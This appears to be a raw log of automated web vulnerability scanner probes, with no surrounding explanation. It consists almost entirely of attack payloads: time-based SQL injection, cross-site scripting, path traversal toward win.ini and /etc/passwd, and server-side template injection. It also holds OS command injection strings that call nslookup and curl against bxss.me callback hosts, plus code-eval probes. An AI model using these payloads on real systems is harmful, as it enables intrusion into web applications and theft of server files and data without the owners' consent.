@@jsJFM
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1RhMzTyQp')) OR 358=(SELECT 358 FROM PG_SLEEP(15))--
1i5ygKsrB') OR 90=(SELECT 90 FROM PG_SLEEP(15))--
11tsN9ILv' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
1-1)) OR 488=(SELECT 488 FROM PG_SLEEP(15))--
1-1) OR 868=(SELECT 868 FROM PG_SLEEP(15))--
1-1 OR 94=(SELECT 94 FROM PG_SLEEP(15))--
1PTPTDViT')); waitfor delay '0:0:15' --
18gx3T0ZT'); waitfor delay '0:0:15' --
1smwUwEqP'; waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1-1)); waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1*if(now()=sysdate(),sleep(15),0)
-1" OR 3*2>(0+5+191-191) --
-1" OR 3*2<(0+5+191-191) --
-1" OR 3+191-191-1=0+0+0+1 --
-1" OR 2+191-191-1=0+0+0+1 --
-1' OR 3*2>(0+5+90-90) or 'HqWK70BS'='
-1' OR 3*2<(0+5+90-90) or 'HqWK70BS'='
-1' OR 3+90-90-1=0+0+0+1 or 'HqWK70BS'='
-1' OR 2+90-90-1=0+0+0+1 or 'HqWK70BS'='
-1' OR 3*2>(0+5+257-257) --
-1' OR 3*2<(0+5+257-257) --
-1' OR 3+257-257-1=0+0+0+1 --
-1' OR 2+257-257-1=0+0+0+1 --
-1 OR 3*2>(0+5+553-553)
-1 OR 3*2<(0+5+553-553)
-1 OR 3+553-553-1=0+0+0+1
-1 OR 2+553-553-1=0+0+0+1
-1 OR 3*2>(0+5+733-733) --
-1 OR 3*2<(0+5+733-733) --
-1 OR 3+733-733-1=0+0+0+1 --
-1 OR 2+733-733-1=0+0+0+1 --
1
1
1<aHMWhMt<
1<img sRc='http://attacker-9644/log.php?
1<aZj1MeT x=9988>
1<ifRAme sRc=9667.com></IfRamE>
1<W6PFDQ>UJ73P[!+!]</W6PFDQ>
1GPTQd
1}body{zzz:Expre/**/SSion(VOPb(9146))}
1<avacARf<
1<img sRc='http://attacker-9416/log.php?
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<aRn8TSm x=9206>
1<input autofocus onfocus=VOPb(9003)>
1<ifRAme sRc=9453.com></IfRamE>
�<img zzz onmouseover=VOPb(93701) //�>
1<ScRiPt>VOPb(9081)</sCripT>
1<WECH6Q>LVGTO[!+!]</WECH6Q>
1\u003CScRiPt\VOPb(9578)\u003C/sCripT\u003E
1vBbrN
<InvalidTag >ZDFU(9357)</ScRiPt>
%31%3C%53%63%52%69%50%74%20%3E%56%4F%50%62%289261%29%3C%2F%73%43%72%69%70%54%3E
Mr.
555
1}body{zzz:Expre/**/SSion(ZDFU(9699))}
1<img/src=">" onerror=alert(9387)>
<a HrEF=jaVaScRiPT:>
1<img src=xyz OnErRor=VOPb(9768)>
1<img src=//xss.bxss.me/t/dot.gif onload=VOPb(9430)>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=ZDFU(9085)>
1<body onload=VOPb(9140)>
�<img zzz onmouseover=ZDFU(99971) //�>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9801'>
1<ScRiPt>ZDFU(9648)</sCripT>
1<isindex type=image src=1 onerror=VOPb(9560)>
1\u003CScRiPt\ZDFU(9122)\u003C/sCripT\u003E
1<svg
%31%3C%53%63%52%69%50%74%20%3E%5A%44%46%55%289300%29%3C%2F%73%43%72%69%70%54%3E
1<InvalidTag
1<img/src=">" onerror=alert(9031)>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9064></ScRiPt>
1<img src=xyz OnErRor=ZDFU(9734)>
1<InvalidTag
1<img src=//xss.bxss.me/t/dot.gif onload=ZDFU(9126)>
1<body onload=ZDFU(9216)>
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%4F%50%62%28%39%39%38%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1<InvalidTag>VOPb(9250)</script>9250
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9882'>
1<InvalidTag>VOPb(9478)</script>
1<isindex type=image src=1 onerror=ZDFU(9061)>
1<W5TD7C>R1TJR[!+!]</W5TD7C>
1<InvalidTag >VOPb(9865)</ScRiPt>
1<svg
� onload=ZDFU(9160);>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1<InvalidTag
>ZDFU(9688)</ScRiPt>
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9393></ScRiPt>
dfb__${98991*97996}__::.x
1<InvalidTag
>ZDFU(9280)</ScRiPt>
dfb[[${98991*97996}]]xca
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%44%46%55%28%39%32%38%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
dfb{{98991*97996}}xca
1<InvalidTag>ZDFU(9985)</script>9985
1<InvalidTag>ZDFU(9697)</script>
1<WE7QJF>QF0MW[!+!]</WE7QJF>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1<InvalidTag >ZDFU(9043)</ScRiPt>
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
<%={{={@{#{${dfb}}%>
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
bfgx8571%C0%BEz1%C0%BCz2a%90bcxhjl8571
dfb{{98991*97996}}xca
bfg5390%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5390
1
19754036
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
'"()&%<zzz><InvalidTag >VOPb(9476)</ScRiPt>
1
1'"()&%<zzz><InvalidTag >VOPb(9024)</ScRiPt>
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
bfgx4605%C0%BEz1%C0%BCz2a%90bcxhjl4605
bfg2428%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2428
19544648
'"()&%<zzz><InvalidTag >ZDFU(9139)</ScRiPt>
1'"()&%<zzz><InvalidTag >ZDFU(9703)</ScRiPt>
@@EXUHK
����%2527%2522\'\"
'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1w1Vyx4Jp')) OR 562=(SELECT 562 FROM PG_SLEEP(15))--
1DrEUL8Tx') OR 583=(SELECT 583 FROM PG_SLEEP(15))--
1dzrIZNFr' OR 735=(SELECT 735 FROM PG_SLEEP(15))--
1-1)) OR 687=(SELECT 687 FROM PG_SLEEP(15))--
1-1) OR 842=(SELECT 842 FROM PG_SLEEP(15))--
1-1 OR 122=(SELECT 122 FROM PG_SLEEP(15))--
1nwNwA1pZ')); waitfor delay '0:0:15' --
1YwTTS4nv'); waitfor delay '0:0:15' --
19Ilc0qI5'; waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1-1)); waitfor delay '0:0:7.729' --
1-1)); waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1<aVlrrvI<
1<img sRc='http://attacker-9783/log.php?
1<aTjh3Iw x=9576>
1<ifRAme sRc=9712.com></IfRamE>
1<WJJTIY>FPK0F[!+!]</WJJTIY>
1NeTCl
<InvalidTag >skXf(9378)</ScRiPt>
1}body{zzz:Expre/**/SSion(skXf(9901))}
1-1; waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
<a HrEF=http://xss.bxss.me></a>
1<input autofocus onfocus=skXf(9992)>
�<img zzz onmouseover=skXf(96851) //�>
1<ScRiPt>skXf(9340)</sCripT>
1\u003CScRiPt\skXf(9957)\u003C/sCripT\u003E
%31%3C%53%63%52%69%50%74%20%3E%73%6B%58%66%289781%29%3C%2F%73%43%72%69%70%54%3E
1<img/src=">" onerror=alert(9318)>
1<img src=xyz OnErRor=skXf(9128)>
1<img src=//xss.bxss.me/t/dot.gif onload=skXf(9121)>
1<body onload=skXf(9394)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9603'>
WEB-INF\web.xml
1<isindex type=image src=1 onerror=skXf(9184)>
WEB-INF/web.xml
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1<svg
� onload=skXf(9272);>
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1<InvalidTag
>skXf(9744)</ScRiPt>
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9097></ScRiPt>
1<InvalidTag
>skXf(9049)</ScRiPt>
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%73%6B%58%66%28%39%36%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
1<InvalidTag>skXf(9306)</script>9306
/../../../../../../../../../../boot.ini
1<InvalidTag>skXf(9492)</script>
../../../../../../../../../../windows/win.ini%00.jpg
1<WXPBWJ>9TPGX[!+!]</WXPBWJ>
C:\WINDOWS\system32\drivers\etc\hosts
file:///etc/passwd
1<InvalidTag >skXf(9495)</ScRiPt>
../../../../../../../../../../../../../../windows/win.ini
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
../../../../../../../../../../../../../../etc/passwd
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
;(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)|(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)&(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)
dfb{{98991*97996}}xca
`(nslookup -q=cname hitwrreppuwznb99e5.bxss.me||curl hitwrreppuwznb99e5.bxss.me)`
bxss.me
|(nslookup -q=cname hitdlnpcmhjhcca67b.bxss.me||curl hitdlnpcmhjhcca67b.bxss.me)
c:/windows/win.ini
&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&'\"`0&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&`'
1
&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&'\"`0&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&`'
/etc/shells
$(nslookup -q=cname hitzcrxqgxqkc87e71.bxss.me||curl hitzcrxqgxqkc87e71.bxss.me)
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
(nslookup -q=cname hitzzvoydgeubadc8f.bxss.me||curl hitzzvoydgeubadc8f.bxss.me))
1
http://bxss.me/t/fit.txt%3F.jpg
|echo ghcmwc$()\ fdrvzu\nz^xyu||a #' |echo ghcmwc$()\ fdrvzu\nz^xyu||a #|" |echo ghcmwc$()\ fdrvzu\nz^xyu||a #
Http://bxss.me/t/fit.txt
&echo nphgur$()\ dwtxcs\nz^xyu||a #' &echo nphgur$()\ dwtxcs\nz^xyu||a #|" &echo nphgur$()\ dwtxcs\nz^xyu||a #
echo ixbxrn$()\ yikqln\nz^xyu||a #' &echo ixbxrn$()\ yikqln\nz^xyu||a #|" &echo ixbxrn$()\ yikqln\nz^xyu||a #
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
<th:t="${dfb}#foreach
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1*if(now()=sysdate(),sleep(15),0)
1
<%={{={@{#{${dfb}}%>
bfgx4076%C0%BEz1%C0%BCz2a%90bcxhjl4076
bfg5358%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5358
19663720
/\xfs.bxss.me?hkbakels.com.hk
'"()&%<zzz><InvalidTag >skXf(9513)</ScRiPt>
<!--
//xfs.bxss.me?hkbakels.com.hk
1'"()&%<zzz><InvalidTag >skXf(9864)</ScRiPt>
xfs.bxss.me?hkbakels.com.hk
http://xfs.bxss.me?hkbakels.com.hk
'"
992339
xfs.bxss.me
-1" OR 3+11-11-1=0+0+0+1 --
-1" OR 2+11-11-1=0+0+0+1 --
-1' OR 3*2>(0+5+40-40) or 'sHKT5KqI'='
-1' OR 3*2<(0+5+40-40) or 'sHKT5KqI'='
"+response.write(9861255*9591349)+"
-1' OR 3+40-40-1=0+0+0+1 or 'sHKT5KqI'='
'+response.write(9861255*9591349)+'
response.write(9861255*9591349)
19900370
/\xfs.bxss.me?hkbakels.com.hk
-1' OR 2+40-40-1=0+0+0+1 or 'sHKT5KqI'='
'+'A'.concat(70-3).concat(22*4).concat(122).concat(83).concat(97).concat(80)+(require'socket'
Socket.gethostbyname('hitos'+'eadopghp2543f.bxss.me.')[3].to_s)+'
'"()&%<zzz><InvalidTag >skXf(9371)</ScRiPt>
//xfs.bxss.me?hkbakels.com.hk
-1' OR 3*2>(0+5+349-349) --
"+"A".concat(70-3).concat(22*4).concat(119).concat(70).concat(113).concat(66)+(require"socket"
Socket.gethostbyname("hitle"+"hnqpeeid8d313.bxss.me.")[3].to_s)+"
<!--
1'"()&%<zzz><InvalidTag >skXf(9180)</ScRiPt>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-1' OR 3*2<(0+5+349-349) --
'"
xfs.bxss.me?hkbakels.com.hk
bxss.me/t/xss.html?%00
-1' OR 3+349-349-1=0+0+0+1 --
-1' OR 2+349-349-1=0+0+0+1 --
http://xfs.bxss.me?hkbakels.com.hk
938703
HttP://bxss.me/t/xss.html?%00
xfs.bxss.me
-1 OR 3+684-684-1=0+0+0+1
-1 OR 2+684-684-1=0+0+0+1
'+'A'.concat(70-3).concat(22*4).concat(103).concat(85).concat(103).concat(90)+(require'socket'
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
bxss.me
"||sleep(27*1000)*totlzc||"
c:/windows/win.ini
${9999625+10000479}
-1 OR 3*2<(0+5+210-210) --
'||sleep(27*1000)*rafyke||'
"+"A".concat(70-3).concat(22*4).concat(106).concat(89).concat(97).concat(84)+(require"socket"
bxss.me/t/xss.html?%00
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
-1 OR 3+210-210-1=0+0+0+1 --
WEB-INF\web.xml
${@print(md5(31337))}\
/etc/shells
http://bxss.me/t/fit.txt%3F.jpg
"&&sleep(27*1000)*cadepp&&"
"+response.write(9817628*9295121)+"
WEB-INF/web.xml
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\